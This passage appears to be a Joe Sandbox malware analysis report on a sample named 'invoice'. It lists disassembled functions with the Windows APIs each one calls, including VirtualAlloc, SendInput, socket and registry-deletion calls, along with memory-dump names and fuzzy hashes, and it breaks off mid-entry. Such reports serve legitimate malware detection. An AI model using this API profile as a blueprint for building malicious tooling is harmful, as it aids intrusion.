                        • Instruction Fuzzy Hash: 22D01231A10713CFD7319F31D81869676D8BF15351F118C2D98C6D6250E675E880DB51
                        Function 01000E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll,?,010010C1), ref: 01000E80
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01000E92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: f04669060e76aae3bb6db0da44a96fe9f2f1435c871717b5a347bd697ed8481f
                        • Instruction ID: 07d8c6ce4a6077025e832e793d345163fdbfc9022f6415eb4a1c7b3e3484059e
                        • Opcode Fuzzy Hash: f04669060e76aae3bb6db0da44a96fe9f2f1435c871717b5a347bd697ed8481f
                        • Instruction Fuzzy Hash: A6D01770510723CFE7329F3AD91868676E8AF45396F118C6EA5CAE6184E7B4C8C0CB50
                        Function 00FF91F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00FF8E09,?,0100F910), ref: 00FF9203
                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FF9215
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetModuleHandleExW$kernel32.dll
                        • API String ID: 2574300362-199464113
                        • Opcode ID: 2244f8d0d90e4d0659605c4e633ac74c3f5e1a299e2e001b352ec5e66f840b5f
                        • Instruction ID: a71513541ce4c7082db76c7a1a4ed82709246a299ad62defee326cdb8f74c48f
                        • Opcode Fuzzy Hash: 2244f8d0d90e4d0659605c4e633ac74c3f5e1a299e2e001b352ec5e66f840b5f
                        • Instruction Fuzzy Hash: C3D0C730958717DFDB328F32C80824272E9AF06361F00C82EA9C2CA160E6B4C8C0EB50
                        Function 00FC1A6D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LocalTime__swprintf
                        • String ID: %.3d$WIN_XPe
                        • API String ID: 2070861257-2409531811
                        • Opcode ID: e5441cf45ece7f4500a5aad8e987ab3be27a225f2ab4a2b772a2bd225a791350
                        • Instruction ID: 701a50af6fb58715796785aa2ac913cfcc6d8923536120d53869fee01dcf97cd
                        • Opcode Fuzzy Hash: e5441cf45ece7f4500a5aad8e987ab3be27a225f2ab4a2b772a2bd225a791350
                        • Instruction Fuzzy Hash: 54D0127380511AEBCB14E6918986FFE737CFB0A300F14405AF442E1041E27D8BA4FB21
                        Function 00FD74A5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                        • Instruction ID: 3b826e1997ad58b5bbf4aa21e0231a9d4c5e1e4acd8b8cf35a4f9fdef33b6934
                        • Opcode Fuzzy Hash: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                        • Instruction Fuzzy Hash: 08C15B75A04216EFCB14DF98C884AAEB7B6FF48710B194599E805EF350E731ED81EB90
                        Function 00FFE13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?), ref: 00FFE1D2
                        • CharLowerBuffW.USER32(?,?), ref: 00FFE215
                          • Part of subcall function 00FFD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFD8D9
                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00FFE415
                        • _memmove.LIBCMT ref: 00FFE428
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharLower$AllocVirtual_memmove
                        • String ID:
                        • API String ID: 3659485706-0
                        • Opcode ID: d75d7e6c82293dca7da5aa95acb0ebbaf87d3d8e786cd7d945cd3be0c8295b9a
                        • Instruction ID: a0fe5a4a8e494c551b665e49e7e9422fc92b6981cd7419011ce37fd053a6e312
                        • Opcode Fuzzy Hash: d75d7e6c82293dca7da5aa95acb0ebbaf87d3d8e786cd7d945cd3be0c8295b9a
                        • Instruction Fuzzy Hash: 8FC18C71A083059FC704DF28C880A6ABBE4FF89724F14896DF999DB361D734E945DB82
                        Function 00FF81A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 00FF81D8
                        • CoUninitialize.OLE32 ref: 00FF81E3
                          • Part of subcall function 00FDD87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDD8E3
                        • VariantInit.OLEAUT32(?), ref: 00FF81EE
                        • VariantClear.OLEAUT32(?), ref: 00FF84BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 780911581-0
                        • Opcode ID: 8d2fc0beb63511b8e1656e6e3b99278421afe900a01d7c66ec6c485c6e00b24a
                        • Instruction ID: 595c004acc8f2157fcd2a1b490528a80086f6b82e72a218271793ebacb640a42
                        • Opcode Fuzzy Hash: 8d2fc0beb63511b8e1656e6e3b99278421afe900a01d7c66ec6c485c6e00b24a
                        • Instruction Fuzzy Hash: 81A15B756087059FCB10EF14C885B6AB7E5BF88364F08444CFA9A9B3A1CB78ED01EB41
                        Function 00FD7858 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                        Download Yara Rule
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7A12
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7A2A
                        • CLSIDFromProgID.OLE32(?,?,00000000,0100FB80,000000FF,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7A4F
                        • _memcmp.LIBCMT ref: 00FD7A70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: 7fc73b703da0af9ec27ce12414a355ad930e98a684b13913d38efd6b46d67e56
                        • Instruction ID: a1c79b4f849e8260f823c52a85001ad911d24df4ed353b56d87ccb3fe0ea7d48
                        • Opcode Fuzzy Hash: 7fc73b703da0af9ec27ce12414a355ad930e98a684b13913d38efd6b46d67e56
                        • Instruction Fuzzy Hash: BD813B72A00209EFCB04DF94C884EEEB7BAFF89315F244199F505AB250DB35AE05DB61
                        Function 00FD6BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$AllocClearCopyInitString
                        • String ID:
                        • API String ID: 2808897238-0
                        • Opcode ID: 8643b3724f28af7587e3dc832eba936ffbaba3bf0a694d48396c2ac404f531b0
                        • Instruction ID: d58c62e3d0f2d9cd65765c6a0e74ba2380c6ef1a6eaf495d568b0a95f20dea9e
                        • Opcode Fuzzy Hash: 8643b3724f28af7587e3dc832eba936ffbaba3bf0a694d48396c2ac404f531b0
                        • Instruction Fuzzy Hash: 92519131B043029BDB20AF65E895B69F3E7EF49310F28882FE596CB391DB749844B715
                        Function 01009826 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(0150DFB8,?), ref: 01009895
                        • ScreenToClient.USER32(00000002,00000002), ref: 010098C8
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01009935
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 97b59d4e3a21558486af955a7cb66b87905fc9e48facdf5e8f2a780b25c97cf0
                        • Instruction ID: 550315d38ebdc39773b5873e688ecf6304bf9a1a6e7b84a99bbda46ab69fb60b
                        • Opcode Fuzzy Hash: 97b59d4e3a21558486af955a7cb66b87905fc9e48facdf5e8f2a780b25c97cf0
                        • Instruction Fuzzy Hash: B9515134900109EFEF22DF6CD9809AE7BF5FF44324F108199F9999B292D731A941CB90
                        Function 00FF6AC0 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00FF6AE7
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6AF7
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FF6B5B
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6B67
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorLast$__itow__swprintfsocket
                        • String ID:
                        • API String ID: 2214342067-0
                        • Opcode ID: c41617cb0d8f13c1c162c9ff6496a937c9a42824e207cb82934b6fe25bac945f
                        • Instruction ID: 5c7cb5e3600559b528856191ce86e4c3fd2655c50198e84b204aa94712e75f6e
                        • Opcode Fuzzy Hash: c41617cb0d8f13c1c162c9ff6496a937c9a42824e207cb82934b6fe25bac945f
                        • Instruction Fuzzy Hash: 0A41A335740200AFEB24BF64DC87F7A77E5AF44B10F448018FA59DB2D2DAB99D01A791
                        Function 00FF6530 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0100F910), ref: 00FF65BD
                        • _strlen.LIBCMT ref: 00FF65EF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID:
                        • API String ID: 4218353326-0
                        • Opcode ID: 73a52ad12f31f152354c1178f4fcb0848d28f9fd26cf4908013c9bc27a7affd4
                        • Instruction ID: d7b7f14ff5a677bec479735fb4ff073024b25cc2e759375d4b8479f74ccbc236
                        • Opcode Fuzzy Hash: 73a52ad12f31f152354c1178f4fcb0848d28f9fd26cf4908013c9bc27a7affd4
                        • Instruction Fuzzy Hash: D941B131A00108ABCB14FBA4ECD5EBEB3A9AF44310F188155F515DB2A2DF39AD00EB50
                        Function 00FEB880 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FEB92A
                        • GetLastError.KERNEL32(?,00000000), ref: 00FEB950
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FEB975
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FEB9A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 1c626b099aa509a3adc2206682805e50330e2ae31e55fc9466ff429e614e119b
                        • Instruction ID: 547a5a8638d5d09d130e780def8bfd2cd7d637984ee40036e264802d47f1f372
                        • Opcode Fuzzy Hash: 1c626b099aa509a3adc2206682805e50330e2ae31e55fc9466ff429e614e119b
                        • Instruction Fuzzy Hash: 46412D39600651DFCB11EF15C484A6DBBF1EF49324B098088ED8A9B762CB79FD01EB91
                        Function 01008883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                        Download Yara Rule
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01008910
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: a6f14d4cc56d686cc481f96514e78c27f9b5765fccfce2975ef352a55705bdb2
                        • Instruction ID: 36cf3f50df54e40abea50f79afbde8e6b811b8ec6ef662a99e6f547de2b953f5
                        • Opcode Fuzzy Hash: a6f14d4cc56d686cc481f96514e78c27f9b5765fccfce2975ef352a55705bdb2
                        • Instruction Fuzzy Hash: 7D31C374A01108BFFF77AA58DC84BAC3BA5FB05310F188157FAD1E62D1C735A6808B52
                        Function 0100AB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                        Download Yara Rule
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 0100AB92
                        • GetWindowRect.USER32(?,?), ref: 0100AC08
                        • PtInRect.USER32(?,?,0100C07E), ref: 0100AC18
                        • MessageBeep.USER32(00000000), ref: 0100AC89
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 3f7380b7a74b8731cba73f8408f1f10f805bfdfc95cfb47773048f703501431a
                        • Instruction ID: ce1c4f7e80d07d52cea6c9540c0054fa3957f681b3d38aec6048c84f83129b7a
                        • Opcode Fuzzy Hash: 3f7380b7a74b8731cba73f8408f1f10f805bfdfc95cfb47773048f703501431a
                        • Instruction Fuzzy Hash: 14419F74B00619DFEB23CF58C984F997BF5FB48300F1981A9E9949B295C735E441CB50
                        Function 00FE0E07 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FE0E58
                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FE0E74
                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FE0EDA
                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FE0F2C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                        • Instruction ID: 7ff9fc4f2541308ed99d74b38d7dbd985b35f79642ae8aab38e6b24d528f5d0a
                        • Opcode Fuzzy Hash: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                        • Instruction Fuzzy Hash: 7F313731D402C8AEFB35CA268C05BFA7BA9EB58320F18462AF1D0521D1CBF98DD5B755
                        Function 00FE0F42 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00FE0F97
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FE0FB3
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FE1012
                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00FE1064
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                        • Instruction ID: 60ed2e5a8cd3cebd8d26980edb6927f9879293d24dc1dcee9087058e9a00ccdb
                        • Opcode Fuzzy Hash: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                        • Instruction Fuzzy Hash: 05313A30E402C8DEFF358A278C08BFABBA6BB49331F04421AE595521D5C7B98DD5B761
                        Function 00FB6345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB637B
                        • __isleadbyte_l.LIBCMT ref: 00FB63A9
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB63D7
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB640D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 6bc96badfb199e9edf6847bafb22bdd2c8d053f81b50f9805ec1684fb913bcb8
                        • Instruction ID: 99b46c81f8869f758052d028a9d9677569d5a4b8e6c4fc15c88518dbfc68dcdf
                        • Opcode Fuzzy Hash: 6bc96badfb199e9edf6847bafb22bdd2c8d053f81b50f9805ec1684fb913bcb8
                        • Instruction Fuzzy Hash: 56319C31A04246EFDB21CF66CC84BAA7BE5FF41320F194029E864C7291EB39D851EF60
                        Function 01004F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 01004F6B
                          • Part of subcall function 00FE3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE369F
